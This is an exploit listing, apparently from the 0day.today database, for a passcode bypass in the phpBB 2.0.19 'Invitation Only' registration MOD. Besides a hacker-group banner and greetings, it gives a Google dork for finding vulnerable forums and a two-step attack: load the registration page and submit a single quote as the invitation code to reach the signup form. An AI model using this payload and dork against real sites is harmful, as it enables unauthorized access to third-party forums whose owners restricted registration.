PHPBB MOD 2.0.19 Invitation Only PassCode Bypass Vulnerability

2010-07-22T00:00:00
ID 1337DAY-ID-13435
Type zdt
Reporter Silic0n
Modified 2010-07-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==============================================================
PHPBB MOD 2.0.19 Invitation Only PassCode Bypass Vulnerability
==============================================================


-------------------------------------------------------------------------------
0                             | |              | |                      | |  TM
1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_
0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_
0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1                         0xPrivate 0xSecurity 0xTeam
0       ++++++++++++++++++++++++++++++++++++++++++++++++++++
1                      A Placec Of 0days  
------------------------------------------------------------------------------
 
^Exploit Title  : PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability)
^Date       : 23/7/2010
^Vendor Site    : www.phpbb.com
^MOD Version    : 1.0.9
^Author     : Silic0n (science_media017[At]yahoo.com)
^Dork       : inurl:profile.php?mode= register If you have an invitation passcode
 
------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,
 Dark , XG3N , Belma(sweety) ,Danzel, messsy , Thor ,abronsius ,Nova ,
 Console Fx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .
 
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com
 
----------------------------------->Exploit<----------------------------------
 
0x1: Goto http://{localhost}/{phpBB path}/profile.php?mode=register
0x2: Enter Passcode Or Invitation code char ' (quote) AND click Submit
 
Now U will See the Registration Form .
------------------------------------------------------------------------------



#  0day.today [2018-01-01]  #